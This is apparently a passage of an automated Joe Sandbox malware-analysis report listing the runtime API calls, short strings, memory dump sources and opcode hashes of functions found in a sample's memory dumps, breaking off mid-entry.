                                                          • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                          • Instruction Fuzzy Hash: F071AE30A04255DFDB04CF68C484BDDB7F0BF14308F1080AAD8656BB91CB75BA4ACB90
                                                          APIs
                                                          • _free.LIBCMT ref: 6C0E5ADD
                                                          • _free.LIBCMT ref: 6C0E5B06
                                                          • SetEndOfFile.KERNEL32(00000000,6C0E46EC,00000000,6C0DB0D0,?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000), ref: 6C0E5B38
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C0E5B54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID: 8Q
                                                          • API String ID: 1547350101-4022487301
                                                          • Opcode ID: a451bc28115d49609fdcf5070d76ca9ece7f9cc1fc6ee75b3339e06a11aa14ba
                                                          • Instruction ID: f9b46d84d014247ce8a0782a893b4207617b708860e57c09b5155c60f4872154
                                                          • Opcode Fuzzy Hash: a451bc28115d49609fdcf5070d76ca9ece7f9cc1fc6ee75b3339e06a11aa14ba
                                                          • Instruction Fuzzy Hash: DB41CB3A640615AFDB019BB8CC81BCE37F5EF4D328F290951E424D7B90EB34E4458B61
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C11E41D
                                                            • Part of subcall function 6C11EE40: __EH_prolog.LIBCMT ref: 6C11EE45
                                                            • Part of subcall function 6C11E8EB: __EH_prolog.LIBCMT ref: 6C11E8F0
                                                            • Part of subcall function 6C11E593: __EH_prolog.LIBCMT ref: 6C11E598
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: &qB$0aJ$A0$XqB
                                                          • API String ID: 3519838083-1326096578
                                                          • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                          • Instruction ID: 75037fd76694717641aeb8acc3d10ed11bbb21d6ba83c55f7acdb7e8ee61ca51
                                                          • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                          • Instruction Fuzzy Hash: 3C21BB71D05258EACB04CBE4D984AECBBF4AF15318F20406AE82263B81DB781F4CCB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: J$0J$DJ$`J
                                                          • API String ID: 3519838083-2453737217
                                                          • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                                          • Instruction ID: 4b5b7cda04984f89d3b6d0abd72616754e08991b0bcff2de465d5458bec061c4
                                                          • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                                          • Instruction Fuzzy Hash: DF11C2B1904B64CEC720DF5AC45429AFBE4BFA6708B10C91FC4A687F50C7F8A549CB99
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C0CF1B4,?,?,6C0CF235,?,?,?), ref: 6C0CF13F
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C0CF152
                                                          • FreeLibrary.KERNEL32(00000000,?,?,6C0CF1B4,?,?,6C0CF235,?,?,?), ref: 6C0CF175
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: d8474030e9de05c9e9d4dafa6830db1a737e308ce5b32c77afc1ae690dbe63c1
                                                          • Instruction ID: 4db272fd0deddf028ff289affeeb73d8fa6864d18cb08b5b1976edd9c1d8df20
                                                          • Opcode Fuzzy Hash: d8474030e9de05c9e9d4dafa6830db1a737e308ce5b32c77afc1ae690dbe63c1
                                                          • Instruction Fuzzy Hash: 6AF08C31601119FBDF02AB90DD19B9E7EF8EB0575AF211060FC15E2490CF708B40DA92
                                                          APIs
                                                          • __EH_prolog3.LIBCMT ref: 6C0C732E
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C0C7339
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C73A7
                                                            • Part of subcall function 6C0C7230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C0C7248
                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 6C0C7354
                                                          • _Yarn.LIBCPMT ref: 6C0C736A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                          • String ID:
                                                          • API String ID: 1088826258-0
                                                          • Opcode ID: bc9210fc9f498b13352b6f7ec903ca33bf7b4157625bfc85c0516289b12440ff
                                                          • Instruction ID: 45c59611db76ce213487bceedcd7eafaa054b97e7172e08b056eb38fe8350744
                                                          • Opcode Fuzzy Hash: bc9210fc9f498b13352b6f7ec903ca33bf7b4157625bfc85c0516289b12440ff
                                                          • Instruction Fuzzy Hash: A701DFB57042149BCB06DF24C840BBC7BF1FF86254B15000AE81197780CF38AA56DBC6
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $!$@
                                                          • API String ID: 3519838083-2517134481
                                                          • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                          • Instruction ID: 7f229535afa36cce14165ec9a3732901ce70c797baf8a42c3c4a534014c53327
                                                          • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                          • Instruction Fuzzy Hash: 38125B74E06249DFCB04CFA4C590ADDBBB1BF09348F14C46AE845ABB51DB31E995CBA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog__aulldiv
                                                          • String ID: $SJ
                                                          • API String ID: 4125985754-3948962906
                                                          • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                          • Instruction ID: 3640b816a64c778e459e0b17da178cc570629f12d8b194fb49ce1b374bca28a1
                                                          • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                          • Instruction Fuzzy Hash: 92B15BB1E05209DFCB14CF99C884AAEBBB1FF59314B20853EE515A7B50D738AA45CF90
                                                          APIs
                                                            • Part of subcall function 6C0C7327: __EH_prolog3.LIBCMT ref: 6C0C732E
                                                            • Part of subcall function 6C0C7327: std::_Lockit::_Lockit.LIBCPMT ref: 6C0C7339
                                                            • Part of subcall function 6C0C7327: std::locale::_Setgloballocale.LIBCPMT ref: 6C0C7354
                                                            • Part of subcall function 6C0C7327: _Yarn.LIBCPMT ref: 6C0C736A
                                                            • Part of subcall function 6C0C7327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C73A7
                                                            • Part of subcall function 6BF92F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF92F95
                                                            • Part of subcall function 6BF92F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF92FAF
                                                            • Part of subcall function 6BF92F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF92FD0
                                                            • Part of subcall function 6BF92F60: __Getctype.LIBCPMT ref: 6BF93084
                                                            • Part of subcall function 6BF92F60: std::_Facet_Register.LIBCPMT ref: 6BF9309C
                                                            • Part of subcall function 6BF92F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF930B7
                                                          • std::ios_base::_Addstd.LIBCPMT ref: 6BF9211B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 3332196525-1866435925
                                                          • Opcode ID: ba7ce5e8529fea1507b47f72df751fdb75fa871f214b502648f4b6260cc00838
                                                          • Instruction ID: 86c2c66132a7525e9e06a299cd669b429aeca26d874329f1f5f3fbba819935b6
                                                          • Opcode Fuzzy Hash: ba7ce5e8529fea1507b47f72df751fdb75fa871f214b502648f4b6260cc00838
                                                          • Instruction Fuzzy Hash: E54191B1A003099FEB00DF64D8457AEBBB1BF48314F108268E9159B391D776A985CF91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $CK$CK
                                                          • API String ID: 3519838083-2957773085
                                                          • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                                          • Instruction ID: 42489e79fb5f75f24405519954dbd08e7fb59f211e757c281c0655f3b0cf9b4c
                                                          • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                                          • Instruction Fuzzy Hash: D6218E70E09209CBCB04DFA884906EEF7B6FB95304F64463AC512E3E91C7794A068AA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: 0$LrJ$x
                                                          • API String ID: 3519838083-658305261
                                                          • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                                          • Instruction ID: d30c84eaa5be220f3f7c930af618f3e42e14f4088553174de430dda44552ebb3
                                                          • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                                          • Instruction Fuzzy Hash: 93214936D011199ACF04DF98C9A0BEDB7F5EF99708F20005AD82173640DB796E89CBA1
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C124ECC
                                                            • Part of subcall function 6C10F58A: __EH_prolog.LIBCMT ref: 6C10F58F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: :hJ$dJ$xJ
                                                          • API String ID: 3519838083-2437443688
                                                          • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                          • Instruction ID: 31d45960e8cc0bc9f8d5c9074e0e702c3de33e26657c986efcf2c70583619d77
                                                          • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                          • Instruction Fuzzy Hash: 6521D8B0901B40CFC760CF6AC14428ABBF4BF2A708B10C95EC4AA97B11D7B8B649CF55
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C0DB0D0,6BF91DEA,00008000,6C0DB0D0,?,?,?,6C0DAC7F,6C0DB0D0,?,00000000,6BF91DEA), ref: 6C0DADC9
                                                          • GetLastError.KERNEL32(?,?,?,6C0DAC7F,6C0DB0D0,?,00000000,6BF91DEA,?,6C0E469E,6C0DB0D0,000000FF,000000FF,00000002,00008000,6C0DB0D0), ref: 6C0DADD3
                                                          • __dosmaperr.LIBCMT ref: 6C0DADDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 2336955059-4022487301
                                                          • Opcode ID: 1eb604cc8cc67b31445948d990e1d2d61aa52ee537b31b1af9f271fbb3a0d0e0
                                                          • Instruction ID: 9839841b224ce3d1d044373a70d650bbf980cc1c1144397b44380d4486d556d0
                                                          • Opcode Fuzzy Hash: 1eb604cc8cc67b31445948d990e1d2d61aa52ee537b31b1af9f271fbb3a0d0e0
                                                          • Instruction Fuzzy Hash: 90018D337146157FCF058FA9DC05A9E3BB9DB853257360205F812D7680EA71F9418BA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <J$DJ$HJ$TJ$]
                                                          • API String ID: 0-686860805
                                                          • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                                          • Instruction ID: f8a1f3c8ae00d835d8d70ca389d91bd4ca9cb420e369e6084cc3c42b00b00101
                                                          • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                                          • Instruction Fuzzy Hash: C14184B0D0A289AECF14DFA1D490AEEB774AF21308B608179D52167F50EB39A649CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv
                                                          • String ID:
                                                          • API String ID: 3732870572-0
                                                          • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                                          • Instruction ID: ba8705e3255ebcbbc0bb7d9928a54326efe2e1a8bb819587232f673a876590b4
                                                          • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                                          • Instruction Fuzzy Hash: 1111A276204248BFEB214BA4CC44FAFBBBDEFC6744F10882DB14556A90D676AC14D760
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,6C0CEF64,6C0F6DD8,0000000C), ref: 6C0D49B7
                                                          • _free.LIBCMT ref: 6C0D4A14
                                                          • _free.LIBCMT ref: 6C0D4A4A
                                                          • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C0CEF64,6C0F6DD8,0000000C), ref: 6C0D4A55
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: 36feddb1ca5eb3a8b9a3612ec61c52bb1cee638ac02395180bf28d21285f13bd
                                                          • Instruction ID: 0840c9032f364b636c5857ac353a752ffac629f0fd6071c8746750d99ebf34b8
                                                          • Opcode Fuzzy Hash: 36feddb1ca5eb3a8b9a3612ec61c52bb1cee638ac02395180bf28d21285f13bd
                                                          • Instruction Fuzzy Hash: 9011C1723043007BAA005BF99C84FDE25E99BC237CB670628F524A7B80DF21B90A4628
                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,?,6C0E46EC,00000000,00000000,?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0), ref: 6C0E5ED1
                                                          • GetLastError.KERNEL32(?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?,6C0DB0D0,?,6C0DBD1C,6C0E5AB6), ref: 6C0E5EDD
                                                            • Part of subcall function 6C0E5F2E: CloseHandle.KERNEL32(FFFFFFFE,6C0E5EED,?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?,6C0DB0D0), ref: 6C0E5F3E
                                                          • ___initconout.LIBCMT ref: 6C0E5EED
                                                            • Part of subcall function 6C0E5F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C0E5EAB,6C0E4B3E,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?), ref: 6C0E5F22
                                                          • WriteConsoleW.KERNEL32(00000000,?,6C0E46EC,00000000,?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?), ref: 6C0E5F02
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: 77f36f920391fd6fca10d0937369c50c9e36571f026525491620a35233cf00d1
                                                          • Instruction ID: 3a092292e0814dd8109e052d59537bb9ba965594089d56de364d7481f404b288
                                                          • Opcode Fuzzy Hash: 77f36f920391fd6fca10d0937369c50c9e36571f026525491620a35233cf00d1
                                                          • Instruction Fuzzy Hash: 86F0C73A540125BFCF121FE5DC04AC93F76FF09765F094510FE1996560DB329960DB90
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C0FE077
                                                            • Part of subcall function 6C0FDFF5: __EH_prolog.LIBCMT ref: 6C0FDFFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: :$\
                                                          • API String ID: 3519838083-1166558509
                                                          • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                                          • Instruction ID: e39e56e55d546afe04bebe2c0c2d38987fb7de828da45796d0e6385b5be4918b
                                                          • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                                          • Instruction Fuzzy Hash: 27E1AF309042099ADB11DFA8C894BEDB7F1BF05318F204219EC7567A91EBB5B5CBCB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog__aullrem
                                                          • String ID: d%K
                                                          • API String ID: 3415659256-3110269457
                                                          • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                                          • Instruction ID: 52c25bf6b0138f3112c574367613fd387830f3daf2b3e3da03f8558e709ffdf1
